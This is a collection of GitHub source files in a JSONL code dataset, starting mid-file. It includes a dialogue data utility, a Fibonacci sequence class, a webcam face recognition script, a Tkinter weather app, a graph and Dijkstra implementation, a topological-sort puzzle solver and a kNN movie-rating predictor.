'_'.join(row['poi'].split())\n # for key,value in row.items():\n # norm_row.append('<'+poi+':'+key+'>')\n norm_row.append('<'+poi+':'+'poi'+'>')\n norm_row.append('<'+poi+':'+'poi_type'+'>')\n norm_kb.append(norm_row)\n return norm_kb\n\n\ndef generate_instances(keys, train_dialogs, triples, value_to_abstract_keys):\n '''\n 生成形如[(u1 s1 u2, s2),...]的数据\n :param keys:\n :param train_dialogs:\n :param triples:\n :param value_to_abstract_keys:\n :return:\n '''\n instances = []\n for dialog in train_dialogs:\n if dialog is not None:\n #if (1):\n #if (dialog['scenario']['task']['intent'] == 'navigate'):\n flag = True\n for dialogue in dialog['dialogue']:\n if (dialogue['turn'] == 'assistant'):\n output_sentence = noralize_value(normalize_key(dialogue['data']['utterance'], keys), value_to_abstract_keys)\n instances.append((input_sentence, output_sentence))\n input_sentence += ' '\n elif (dialogue['turn'] == 'driver'):\n if flag:\n input_sentence = ''\n flag = False\n pass\n else:\n input_sentence += ' '\n input_sentence += normalize_key(dialogue['data']['utterance'], keys)\n\n return instances\n\n\ndef sentence_to_idx(lang, instances):\n '''\n\n :param lang:\n :param train_instances: [(),()]\n :return: [(([],[]),[[],[],..]),()]\n '''\n idx_instances = []\n for (instance, kb) in instances:\n instance_0 = [lang.word2idx['']]+ lang.sentence_to_idx(instance[0])\n instance_1 = [lang.word2idx['']]+ lang.sentence_to_idx(instance[1]) + [lang.word2idx['']]\n kb_ = copy.deepcopy(kb)\n if kb_ is not None:\n for item in kb_:\n for idx,key in enumerate(item):\n item[idx] = lang.word2idx.get(key, 1)\n idx_instances.append(((instance_0, instance_1),kb_))\n return idx_instances\n\n\ndef generate_batch(instances, batch_gold, batch_size, pad_idx):\n '''\n\n :param instances: [(([],[]),[[],[],..]),()]\n :param batch_gold:\n :param pad_idx:\n :return: [[],] (batch_size, max_length)\n '''\n batch_input = []\n batch_output = []\n batch_kb = []\n for ((input, output), kb) in instances:\n batch_input.append(input)\n batch_output.append(output)\n batch_kb.append(kb)\n\n batch_gold_output = []\n\n for (_, gold_output) in batch_gold:\n batch_gold_output.append(gold_output)\n\n lst = range(batch_size)\n lst = sorted(lst, key = lambda d: -len(batch_input[d]))\n batch_input = [batch_input[ids] for ids in lst]\n batch_output = [batch_output[ids] for ids in lst] # 这里是统一按照lst进行排序,我们后面是按照output的原始顺序来做\n batch_gold_output = [batch_gold_output[ids] for ids in lst]\n batch_kb = [batch_kb[ids] for ids in lst] # [[[],..],..]\n\n batch_poi = []\n batch_type = []\n max_poi, max_type = 0, 0\n for idx,item in enumerate(batch_kb): # 行要满8\n if item is not None:\n # for key in item:\n # max_poi = max(len(key['poi']), max_poi)\n # max_type = max(len(key['poi_type']), max_type)\n if len(item) < 8:\n batch_kb[idx].append([1,1]) # fixme 这里用0还是1\n else:\n raise (IOError)\n # batch_poi = [[key['poi'] + [0] * (max_poi - len(key['poi'])) for key in item] \\\n # for item in batch_kb]\n # batch_type = [[key['poi_type'] + [0] * (max_type - len(key['poi_type'])) for key in item] \\\n # for item in batch_kb]\n\n input_max_length = len(batch_input[0])\n output_max_length = max([len(batch_output[i]) for i in range(batch_size)])\n sentence_lens = [len(batch_input[i]) for i in range(batch_size)]\n\n batch_input = [batch_input[i] + [pad_idx] * (input_max_length - len(batch_input[i])) for i in range(batch_size)]\n batch_output = [batch_output[i] + [pad_idx] * (output_max_length - len(batch_output[i])) for i in range(batch_size)]\n\n batch_input = 
Variable(torch.LongTensor(batch_input)).cuda() if use_cuda else Variable(torch.LongTensor(batch_input))\n batch_output = Variable(torch.LongTensor(batch_output)).cuda() if use_cuda else Variable(torch.LongTensor(batch_output))\n\n # batch_poi = Variable(torch.LongTensor(batch_poi)).cuda() if use_cuda else Variable(torch.LongTensor(batch_poi))\n # batch_type = Variable(torch.LongTensor(batch_type)).cuda() if use_cuda else Variable(torch.LongTensor(batch_type))\n batch_kb = Variable(torch.LongTensor(batch_kb)).cuda() if use_cuda else Variable(torch.LongTensor(batch_kb))\n\n return batch_input, batch_output, batch_gold_output, batch_kb, batch_poi, batch_type, sentence_lens\n\n\ndef flatten(lst):\n return list(itertools.chain.from_iterable(lst))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"uniphix000/HQ_KeyValue","sub_path":"new_data_src_attn/src/datautils.py","file_name":"datautils.py","file_ext":"py","file_size_in_byte":16397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25581567238","text":"#immutable type sequence\nfrom functools import lru_cache\n\nclass Fib:\n\n def __init__(self, n):\n self.n = n\n \n def __len__(self):\n return self.n\n \n def __getitem__(self, s):\n if isinstance(s, int):\n if s < 0:\n s = self.n + s\n if s < 0 or s >= self.n:\n raise IndexError\n return Fib._fib(s)\n else:\n rng = range(*s.indices(self.n))\n return [Fib._fib(i) for i in rng]\n \n @staticmethod\n @lru_cache(2**10)\n def _fib(n):\n if n < 2:\n return 1\n return Fib._fib(n-1) + Fib._fib(n-2)\n \nfib = Fib(10)\nprint(fib[0:4])\nprint(fib[-1:-4:-1])\nprint(list(fib))\n\nl1 = [1,2,3]\nl1 += range(7, 10)\nprint(l1)\n","repo_name":"rkoch7/Learning-Python","sub_path":"custom_sequence.py","file_name":"custom_sequence.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70165919461","text":"import face_recognition, cv2\r\nimport numpy as np\r\n\r\nprint(\"loading files...\")\r\npathToFile = \"\" \"\"#enter the path to the image file here\r\n\r\n# you can repeat the next 2 lines for as many faces as you would want to test for.\r\nmyImage = face_recognition.load_image_file(pathToFile)#loads the image to be processed\r\nmyImageEncoding = face_recognition.face_encodings(myImage)[0]#returns the encoding of the face of the individual in the image\r\nknown_face_encodings= [myImageEncoding]\r\nknown_face_names = [\"Evans\"]\r\n\r\nprint(\"file loading complete.\")\r\n\r\n# You can do it like this\r\n# name = \"\" # must be defined\r\n# known_face_data = {\r\n# name: myImageEncoding\r\n# }\r\n\r\nprint(\"starting cv2...\")\r\nliveVideo = cv2.VideoCapture(0) #takes video from webCam\r\n\r\n#starting in an infinite loop to be able to continue until a condition is met.\r\nface_encodings = []\r\nface_locations = [] #declaring it here to keep the variables global so that we can do whatever we want to do with it later.\r\nfont = cv2.FONT_HERSHEY_DUPLEX\r\nwhile True:\r\n print(\"in the loop\")\r\n # cv2.VideoCapture().read() returns a tuple (x,y)\r\n # x is a boolean to determine whether there is a frame \r\n # y is the frame\r\n # NB: a video is just a series of images being played \"very fast\"... so we will process it frame by frame\r\n isCompleted, frameBGR = liveVideo.read() #returns a tuple\r\n frameRGB = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2RGB) #cv2 captures frames in BGR but face_recognition works in RGB... 
therefore the need to convert from BGR to RGB\r\n\r\n face_locations = face_recognition.face_locations(frameRGB) #get all the faces in the image\r\n face_encodings = face_recognition.face_encodings(frameRGB, face_locations) #get all the face encodings in the image\r\n\r\n for (point1, point2, point3, point4), face_encoding in zip(face_locations, face_encodings):\r\n # NB:\r\n # point1-------point2\r\n # | |\r\n # | |\r\n # point4-------point3\r\n # going through all the known faces and face_encodings to determine if there are matches\r\n \r\n name = \"Unknown\" # default name before a test is conducted\r\n\r\n print(\"face(s) detected..\")\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding) #checking if there is a matching face... returns a list of bools\r\n print(matches)\r\n print('****************q')\r\n\r\n # Testing can be done in 2 ways\r\n \r\n #First\r\n # if True in matches: #if a match has been detected\r\n # name = known_face_names[matches.index(True)] # name is gotten using the index of the element that is True\r\n\r\n #Second\r\n #found this on the internet\r\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding) # determines how closely related the faces are... returns a numpy array\r\n print(face_distances)\r\n print('****************q')\r\n best_match_index = np.argmin(face_distances) # this returns the index of the minimum value... minimum value would be the one with the least error between the various face_encodings\r\n if matches[best_match_index]:\r\n name = known_face_names[best_match_index]\r\n\r\n cv2.rectangle(frameBGR, (point4, point1), (point2, point3), (0, 255, 0), 2) # draw a bounding box around face\r\n # cv2.rectangle(frameToDrawOn, startingPoint, endPoint, color, widthOfLine) describes the function above\r\n cv2.putText(frameBGR, name,(point4, point1 - 40), font, 1, (0, 0, 255), 1, cv2.LINE_AA) # write text on the image\r\n\r\n cv2.imshow('LiveVideo', frameBGR) # shows the frame\r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n # this checks to see if the letter 'q' is pressed... if so, it will break.\r\n # here is a link if you would like more info: https://stackoverflow.com/questions/57690899/how-cv2-waitkey1-0xff-ordq-works\r\n break\r\nliveVideo.release() #release the hardware and software resources in use by the cv2.VideoCapture() function. \r\n# if not done... 
the camera will not be able to function upon another cv2.VideoCapture() call\r\ncv2.destroyAllWindows() # destroy all the windows up atm..","repo_name":"AWESOME04/Facial-Recognition-Using-Python-OpenCV","sub_path":"FaceRecon.py","file_name":"FaceRecon.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15604811732","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport requests\n#-----------------------------------------------------\nurl=\"http://api.openweathermap.org/data/2.5/weather?q={}&appid={}\"\napi_key=\"2b980defab2037105b2465caee9b70c1\"\n\nwin=Tk()\n\nwin.title(\"KWeather\")\n\nwin.geometry(\"450x325+100+50\")\nwin.resizable(width=False,height=False)\n\nicon=PhotoImage(file=\"Weather.png\")\nwin.call(\"wm\",\"iconphoto\",win._w,icon)\n#--------------------------------------------------------\ndef gwthr(city):\n urwpi=requests.get(url.format(city,api_key))\n if urwpi:\n jsonData=urwpi.json()\n city=jsonData[\"name\"]\n contry=jsonData[\"sys\"][\"country\"]\n tempk=jsonData[\"main\"][\"temp\"]\n tempc=tempk-273.15\n tempf=(tempk-273.15)*9/5+32\n wthr=jsonData[\"weather\"][0][\"main\"]\n pres=jsonData[\"main\"][\"pressure\"]\n des=jsonData[\"weather\"][0][\"description\"]\n fire=(city,contry,tempc,tempf,wthr,pres,des)\n return fire\n else:\n return None\ndef serch():\n city=citytx.get()\n wthrdt=gwthr(city)\n if wthrdt:\n lbloc[\"text\"]=(f\"location:{wthrdt[0]},{wthrdt[1]}\")\n lbltemp[\"text\"]=(\"Temperature:{:.2f}°C,{:.2f}°F\".format(wthrdt[2],wthrdt[3]))\n lblwth[\"text\"]=(f\"weather:{wthrdt[4]}\")\n lblprs[\"text\"]= (f\"Pressure:{wthrdt[5]}\")\n else:\n messagebox.showerror(\"Error\",f\"can not find city 
{city}\")\n\n\n\n#----------------------------------------------------\ncan0=Canvas(win,width=450,height=300,bg=\"#B6B6B4\",relief=\"raise\")\ncan0.pack()\n\ncan1=Canvas(win,width=445,height=250,bg=\"#D1D0CE\")\ncan0.create_window(224,180,window=can1)\n\ncan2=Canvas(win,width=445,height=50,bg=\"#B6B6B4\")\ncan0.create_window(224,300,window=can2)\n#--------------------------------------------------------\nphoto=Image.open(\"WH.png\")\nphoto=photo.resize((45,45))\nimg1=ImageTk.PhotoImage(photo)\nlblimg=Label(win,width=42,height=42,image=img1,bg=\"#B6B6B4\")\ncan0.create_window(25,25,window=lblimg)\n\ncitytx=StringVar()\n\ncityen=Entry(win,text=\"Location\",fg=\"black\",width=20,bg=\"#D1D0CE\",bd=0,font=(\"times\",14),textvariable=citytx)\ncan0.create_window(270,25,window=cityen)\n\nmytit=Label(win,text=\"KWeather\",font=(\"times\",14,\"bold\"),bg=\"#B6B6B4\")\ncan0.create_window(100,20,window=mytit)\n\nserbtn=Button(win,command=serch,text=\"Refesh\",padx=4,pady=2,relief=FLAT,cursor=\"hand2\",activebackground=\"#c1bebe\",font=(\"helvetica\",10,\"bold\"),bg=\"#D1D0CE\",fg=\"black\")\ncan0.create_window(410,25,window=serbtn)\n#------------------------------------------------------\nlbloc=Label(win,text=\"\",bg=\"#D1D0CE\")\nlbloc.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,30,window=lbloc)\n\nlbltemp=Label(win,text=\"\",bg=\"#D1D0CE\")\nlbltemp.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,80,window=lbltemp)\n\nlblwth=Label(win,text=\"\",bg=\"#D1D0CE\")\nlblwth.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,140,window=lblwth)\n\nlblprs=Label(win,text=\"\",bg=\"#D1D0CE\")\nlblprs.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,200,window=lblprs)\n#-----------------------------------------------\nmytit=Label(win,text=\"Development In Python By Khaled Ezzeddin\",font=(\"times\",10),bg=\"#B6B6B4\")\ncan2.create_window(225,25,window=mytit)\n#---------------------------------------------\nwin.mainloop()\n","repo_name":"KhaledEzzeddin/KHM-Weather","sub_path":"KWeather.py","file_name":"KWeather.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27053957455","text":"from collections import deque\nfrom sys import maxsize\n\n\nclass Graph:\n\tdef __init__(self, vertices:int):\n\t\tself.edges = []\n\t\tself.vertices = vertices\n\n\t\tfor i in range(vertices):\n\t\t\tsub_edges = []\n\t\t\tfor j in range(vertices):\n\t\t\t\tsub_edges.append(0)\n\t\t\tself.edges.append(sub_edges)\n\n\tdef addEdge(self, v1:int, v2:int, weight=1, isBothway=True):\n\t\tself.edges[v1][v2] = weight\n\t\tif isBothway:\n\t\t\tself.edges[v2][v1] = weight\n\n\tdef outDegree(self, v1:int):\n\t\tdegree = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[v1][i] > 0:\n\t\t\t\tdegree += 1\n\t\treturn degree\n\n\tdef inDegree(self, v1:int):\n\t\tdegree = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[i][v1] > 0:\n\t\t\t\tdegree += 1\n\t\treturn degree\n\n\tdef inCost(self, v1:int):\n\t\ttotal_cost = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[v1][i] > 0:\n\t\t\t\ttotal_cost += self.edges[v1][i]\n\t\treturn total_cost\n\n\tdef outCost(self, v1:int):\n\t\ttotal_cost = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[i][v1] > 0:\n\t\t\t\ttotal_cost += self.edges[i][v1]\n\t\treturn total_cost\n\n\tdef topSortUtil(self, v:int, visited:list, stack:deque):\n\t\tvisited[v] = True\n\n\t\tfor i in range(len(self.edges[v])):\n\t\t\t# To get the 
edge has never visited and vertice exists\n\t\t\tif visited[i] is False and self.edges[v][i] > 0:\n\t\t\t\tvisited, stack = self.topSortUtil(i, visited, stack)\n\n\t\t# If there is no next vertice exist, push this node to stack\n\t\tstack.append(v)\n\t\treturn visited, stack\n\n\n\tdef topologicalSort(self):\n\t\tindegree = []\n\t\t# To add the indegree for every edge\n\t\tfor i in range(self.vertices):\n\t\t\tindegree.append(self.inDegree(i))\n\n\t\t# Declare stack for ordering and a list of visited to keep track\n\t\tstack = deque()\n\t\tvisited = []\n\t\tfor i in range(self.vertices):\n\t\t\tvisited.append(False)\n\n\t\tfor i in range(self.vertices):\n\t\t\tif visited[i] is False:\n\t\t\t\tvisited, stack = self.topSortUtil(i, visited, stack)\n\t\t# Reversing the list is same as popping all elems to a list\n\t\treturn list(stack)[::-1]\n\n\t# Source: https://www.geeksforgeeks.org/dijkstras-shortest-path-algorithm-greedy-algo-7/\n\tdef minDistance(self, dist, sptSet):\n\t\tminDist = maxsize\n\n\t\tfor v in range(self.vertices):\n\t\t\t# Find the vertex if they are not in min distance vertex\n\t\t\tif dist[v] < minDist and sptSet[v] is False:\n\t\t\t\tminDist = dist[v]\n\t\t\t\tmin_index = v\n\n\t\treturn min_index\n\n\tdef dijkstra(self, origin):\n\t\tprint('We called the function')\n\t\t# Put every vertice distance be inf\n\t\tdist = [maxsize for i in range(self.vertices)]\n\t\t# Origin to origin is 0 in distance\n\t\tdist[origin] = 0\n\t\t# Declase a list of visited to keep track\n\t\tsptSet = [False for i in range(self.vertices)]\n\n\t\tfor _ in range(self.vertices):\n\t\t\t# Find the closest vertex\n\t\t\tu = self.minDistance(dist, sptSet)\n\t\t\t# Keep track of the min distance vertex has found\n\t\t\tsptSet[u] = True\n\t\t\tprint(sptSet)\n\t\t\tprint('Now is', _)\n\t\t\tprint('u is', u)\n\n\t\t\t# Update distance of adjacent vertices of picked vertex\n\t\t\t# if the current distance is greater than new distance\n\t\t\tfor v in range(self.vertices):\n\t\t\t\t# Check vertex exists, self.edges[u][v] > 0\n\t\t\t\t# Whether this node is on min distance, if True, pass\n\t\t\t\t# Compare distance, take the lower one\n\t\t\t\tprint(dist[u],'+',self.edges[u][v],'=',dist[u] + self.edges[u][v])\n\t\t\t\tif self.edges[u][v] > 0 and sptSet[v] is False and \\\n\t\t\t\tdist[v] > dist[u] + self.edges[u][v]:\n\t\t\t\t\tdist[v] = dist[u] + self.edges[u][v]\n\t\t\tprint(dist)\n\n\t\tprint(\"Vertex \\tDistance from Source\")\n\t\tfor node in range(self.vertices): \n\t\t\tprint(node, \"\\t\", dist[node])\n","repo_name":"jacquessham/DataStructure","sub_path":"Graphs/Python/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71586503780","text":"# %%\nimport re\nimport pandas as pd\nroot_path = \"../\"\ntickers = [\"TSLA\", \"AAPL\", \"AMZN\", \"FB\", \"MSFT\", \"TWTR\", \"AMD\", \"NFLX\", \"NVDA\", \"INTC\"]\nd = {}\n# %%\n\nfor ticker in tickers:\n with open(root_path + f\"10_code/logs/{ticker}_filtering.log\") as f:\n s = f.read()\n\n regex = re.compile(r\"(?<=shape: \\()\\d+(?=, \\d+\\))\")\n results = re.findall(regex, s)\n\n d.update({ticker: pd.Series(results).drop_duplicates().astype('int32')})\n\n# %%\ndf = (\n pd.DataFrame\n .from_dict(d)\n .set_axis(['initial', 'language filter', '#cashtags filter'], axis=0)\n .T\n )\n\n#%%\ndf.applymap(lambda x: f\"{x:,}\").to_csv(root_path + \"30_results/filtering_stats.csv\", sep=';')\n\n#%%\nrel_reduction = df['#cashtags 
filter'].astype('int32') / df['initial'].astype('int32')\n\nprint(f\"relative reduction: {rel_reduction.mean()*100:.1f}% (SD={rel_reduction.std()*100:.2f}%p)\")","repo_name":"moritzwilksch/SocialMediaBusinessAnalytics","sub_path":"10_code/46_logs_to_table.py","file_name":"46_logs_to_table.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31072753014","text":"#!/usr/bin/env python3\n\nfrom collections import deque\n\n\ndef getTopologicalOrder(graph):\n \"\"\" Uses DFS to extract topological sort \"\"\"\n topological_order = []\n marked = set()\n stack = [(\"Galactica\", False)]\n while stack:\n planet, expanded = stack.pop()\n if planet in marked:\n continue\n if expanded:\n marked.add(planet)\n topological_order.append(planet)\n else:\n stack.append((planet, True))\n for successor in graph.get(planet, []):\n stack.append((successor, False))\n topological_order.reverse()\n return topological_order\n\n\ndef getNumberOfDifferentPaths(graph):\n \"\"\" Uses Dynamic Programming to find number of different paths to each\n node \"\"\"\n topological_order = getTopologicalOrder(graph)\n number_of_different_paths = {planet: 0 for planet in topological_order}\n number_of_different_paths[\"Galactica\"] = 1\n for planet in topological_order:\n for successor in graph.get(planet, []):\n number_of_different_paths[successor] += number_of_different_paths[planet]\n return number_of_different_paths[\"New Earth\"]\n\n\ndef main():\n C = int(input())\n for i in range(1,C+1):\n P = int(input())\n graph = {}\n for _ in range(P):\n origin, tail = input().split(\":\")\n for destination in tail.split(\",\"):\n try:\n graph[origin].append(destination)\n except KeyError:\n graph[origin] = [destination]\n print(\"Case #{}: {}\".format(i, getNumberOfDifferentPaths(graph)))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sprkrd/tuentichallenge9","sub_path":"p02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"731296017","text":"#Load Packages\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import pairwise_distances\n\n#Load user, movie and train files as dataframes\nmovie_df = pd.read_csv('movie.txt', sep='\\t' )\nuser_df = pd.read_csv('user.txt', sep='\\t' )\ntrain_df = pd.read_csv('train.txt', sep='\\t' )\n\n#We modify the movie dataframe to contain columns for each genre so that each genre is a feature by itself and we delete the original Genre column\nmovie_df['Genre']=movie_df['Genre'].astype(str) #Convert the Genre column into string type\n\ngenre=[] #Create an empty list to store lists containing genre names for different movis\nfor index, row in movie_df.iterrows(): #Loop over all the rows in the movie dataframe\n genre.append(row['Genre'].strip().split('|')) #Remove blank spaces from the values in Genre and split it at | to form lists and append it to the genre list\ntemp=[] #Create and an empty list temp to store all genre names\nfor i in genre: #Loop over the lists stores in genre\n for j in i: #Loop over the values in these lists\n temp.append(j.strip()) #Remove blank spaces if any and append it to temp\ngenre=temp[:] #Store all values of temp in genre\ndel temp #Delete temp as it is no longer required\ngenre=sorted(set(genre)) #Use set() to store only unique genre names\ngenre.remove('nan') #Remove nan values\n\nfor i in genre: #Loop over all genre 
names stored in the list genre\n movie_df[i]=0 #Create a column for each of these genres in the movie dataframe and initialize to zero\n\nfor index, row in movie_df.iterrows(): #Loop over each row of movie dataframe\n genre_name=[] #Create an empty list genre_name to store genres for each movie\n genre_name.append(row['Genre'].strip().split('|')) #Remove blank spaces from the values in Genre and split it at | to form lists and append it to the genre_name list\n for i in genre_name[0]: #Loop over the genres in genre_name\n if i.strip() != 'nan': #If the name is not equal to nan\n movie_df.at[index, i.strip()] = 1 #Set the value for the corresponding genre column in movie dataframe to 1\n\ndel movie_df['Genre'] #Delete the Genre column from movie dataframe\n\n#Updating the user dataframe\nuser_df.replace('M', 1, inplace=True) #Changing M to 1 in Gender column of user dataframe\nuser_df.replace('F', 2, inplace=True) #Changing F to 2 in Gender column of user dataframe\n\n#Changing column names in user and movie dataframe to better suit the merging with the train dataframe\nnames = user_df.columns.tolist() #Add column names from user dataframe to a list called names\nnames[names.index('ID')] = 'user-Id' #Change the value at the index of value 'ID' to 'user-Id'\nuser_df.columns = names #Update the column names in user_df to the updated names in the names list\n\nnames = movie_df.columns.tolist() #Add column names from movie dataframe to a list called names\nnames[names.index('Id')] = 'movie-Id' #Change the value at the index of value 'Id' to 'movie-Id'\nmovie_df.columns = names #Update the column names in movie_df to the updated names in the names list\n\n#Merging user and train dataframe on 'user-Id' to form new dataframe called temp_df\ntemp_df=(pd.merge(user_df,train_df , on ='user-Id' ))\n\n#Merging temp_df and movie_df on 'movie-Id' to form new dataframe called final_train_df\nfinal_train_df = pd.merge(temp_df, movie_df, on ='movie-Id')\n\n#Update final_train_df\ndel final_train_df['movie-Id'] #Delete movie-Id column from final_train_df\ndel final_train_df['user-Id'] #Delete user-Id from final_train_df\nfinal_train_df.sort_values(by='Id', inplace=True) #Sort the final_train_df dataframe by Id\nfinal_train_df.set_index('Id',inplace=True) #Make Id as the index of final_train_df dataframe\n\n#Normalizing the columns\ncols_to_norm = ['Gender', 'Age', 'Occupation', 'Year'] #Make a list of the columns to normalize\nfinal_train_df[cols_to_norm] = final_train_df[cols_to_norm].apply(lambda x: (x - x.min()) / (x.max() - x.min()) + 0.5) \n#The line above normalizes the columns given in list cols_to_norm using a lambda function such that the range of the normalized values is from 0.5 to 1.5\n\nfinal_train_df.replace('NaN', 0, inplace=True) #Replace NaN values by 0 in final_train_df\n\n#Make rating the last column in final_train_df\ncolumns = list(final_train_df.columns.values) #List of all the columns in final_train_df\ncolumns.pop(columns.index('rating')) #Remove rating from the columns list\nfinal_train_df = final_train_df[columns+['rating']] #Create new dataframe with columns in the order you want\n\n#Load the test dataframe\ntest_df = pd.read_csv('test.txt', sep='\\t')\n\ndel temp_df #Delete the temp_df dataframe\ntemp_df=(pd.merge(user_df,test_df , on ='user-Id' )) #Merge the user dataframe and test dataframe on 'user-Id' and create new dataframe called temp_df\nfinal_test_df = pd.merge(temp_df, movie_df, on ='movie-Id') #Merge temp_df and movie_df on 'movie-Id' and store in 
\n\ndel movie_df['Genre'] #Delete the Genre column from movie dataframe\n\n#Updating the user dataframe\nuser_df.replace('M', 1, inplace=True) #Changing M to 1 in Gender column of user dataframe\nuser_df.replace('F', 2, inplace=True) #Changing F to 2 in Gender column of user dataframe\n\n#Changing column names in user and movie dataframe to better suit the merging with the train dataframe\nnames = user_df.columns.tolist() #Add column names from user dataframe to a list called names\nnames[names.index('ID')] = 'user-Id' #Change the value at the index of value 'ID' to 'user-Id'\nuser_df.columns = names #Update the column names in user_df to the updated names in the names list\n\nnames = movie_df.columns.tolist() #Add column names from movie dataframe to a list called names\nnames[names.index('Id')] = 'movie-Id' #Change the value at the index of value 'Id' to 'movie-Id'\nmovie_df.columns = names #Update the column names in movie_df to the updated names in the names list\n\n#Merging user and train dataframe on 'user-Id' to form new dataframe called temp_df\ntemp_df=(pd.merge(user_df,train_df , on ='user-Id' ))\n\n#Merging temp_df and movie_df on 'movie-Id' to form new dataframe called final_train_df\nfinal_train_df = pd.merge(temp_df, movie_df, on ='movie-Id')\n\n#Update final_train_df\ndel final_train_df['movie-Id'] #Delete movie-Id column from final_train_df\ndel final_train_df['user-Id'] #Delete user-Id from final_train_df\nfinal_train_df.sort_values(by='Id', inplace=True) #Sort the final_train_df dataframe by Id\nfinal_train_df.set_index('Id',inplace=True) #Make Id as the index of final_train_df dataframe\n\n#Normalizing the columns\ncols_to_norm = ['Gender', 'Age', 'Occupation', 'Year'] #Make a list of the columns to normalize\nfinal_train_df[cols_to_norm] = final_train_df[cols_to_norm].apply(lambda x: (x - x.min()) / (x.max() - x.min()) + 0.5)\n#The line above min-max normalizes the columns in cols_to_norm so that the normalized values range from 0.5 to 1.5\n\nfinal_train_df.replace('NaN', 0, inplace=True) #Replace NaN values by 0 in final_train_df\n\n#Make rating the last column in final_train_df\ncolumns = list(final_train_df.columns.values) #List of all the columns in final_train_df\ncolumns.pop(columns.index('rating')) #Remove rating from the columns list\nfinal_train_df = final_train_df[columns+['rating']] #Create new dataframe with columns in the order you want\n\n#Load the test dataframe\ntest_df = pd.read_csv('test.txt', sep='\\t')\n\ndel temp_df #Delete the temp_df dataframe\ntemp_df=(pd.merge(user_df,test_df , on ='user-Id' )) #Merge the user dataframe and test dataframe on 'user-Id' and create new dataframe called temp_df\nfinal_test_df = pd.merge(temp_df, movie_df, on ='movie-Id') #Merge temp_df and movie_df on 'movie-Id' and store in final_test_df\n\nfinal_test_df.sort_values(by='Id', inplace=True) #Sort final_test_df by Id\ndel final_test_df['movie-Id'] #Delete movie-Id column from final_test_df\ndel final_test_df['user-Id'] #Delete user-Id column from final_test_df\nfinal_test_df.set_index('Id',inplace=True) #Make Id as the index of final_test_df\n\ndel test_df #Delete test_df\ndel temp_df #Delete temp_df\ndel user_df #Delete user_df\ndel movie_df #Delete movie_df\ndel train_df #Delete train_df\n\nfinal_test_df['rating']=0 #Create column rating in final_test_df and initialize it to zero\n\n#Normalize the columns\ncols_to_norm = ['Gender', 'Age', 'Occupation', 'Year'] #Make a list of the columns to normalize\nfinal_test_df[cols_to_norm] = final_test_df[cols_to_norm].apply(lambda x: (x - x.min()) / (x.max() - x.min()) + 0.5)\n#The line above min-max normalizes the columns in cols_to_norm so that the normalized values range from 0.5 to 1.5\n\nfinal_test_df.replace('NaN', 0, inplace=True) #Replace NaN in final_test_df by zero\n\n#Creating arrays for final_train_df and final_test_df\ntrain_data = final_train_df.values\ntest_data = final_test_df.values\n\n#Finding 15 nearest neighbors and using majority vote to obtain ratings in final_test_df\nn_rows, n_cols = final_test_df.shape #Store the number of rows in n_rows\nfor i in range(n_rows):\n    cos_dist = pairwise_distances(train_data[:,:-1], test_data[i,:-1].reshape(1,-1), metric=\"cosine\")\n    #The previous line finds the cosine distance of a row in the final_test_df with all the rows in the final_train_df\n    closest_neighbors = cos_dist[:,0].argsort()[:15]\n    #The previous line gets the indices of the 15 closest neighbors and stores them in closest_neighbors\n    final_test_df.iloc[i, final_test_df.columns.get_loc('rating')] = final_train_df.iloc[closest_neighbors]['rating'].value_counts().idxmax()\n    #The previous line gets the ratings of all the closest neighbors, then counts (.value_counts()) the number of times each value occurs\n    #and then takes the value with the maximum count (.idxmax()) and writes it into the rating column\n\nfinal_test_df.reset_index(level=0, inplace=True) #Move Id from the index back to a regular column\n\n#Deleting all unnecessary columns from final_test_df\ndel final_test_df['Gender']\ndel final_test_df['Age']\ndel final_test_df['Occupation']\ndel final_test_df['Year']\ndel final_test_df['Action']\ndel final_test_df['Adventure']\ndel final_test_df['Animation']\ndel final_test_df[\"Children's\"]\ndel final_test_df['Comedy']\ndel final_test_df['Crime']\ndel final_test_df['Documentary']\ndel final_test_df['Drama']\ndel final_test_df['Fantasy']\ndel final_test_df['Film-Noir']\ndel final_test_df['Horror']\ndel final_test_df['Musical']\ndel final_test_df['Mystery']\ndel final_test_df['Romance']\ndel final_test_df['Sci-Fi']\ndel final_test_df['Thriller']\ndel final_test_df['War']\ndel final_test_df['Western']\n\n#Saving the final_test_df as a .txt file\nfinal_test_df.to_csv('Final_kNN15_Sol.txt', index=False)","repo_name":"harshadrai/Data-Mining","sub_path":"Project_Movie_Rating/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
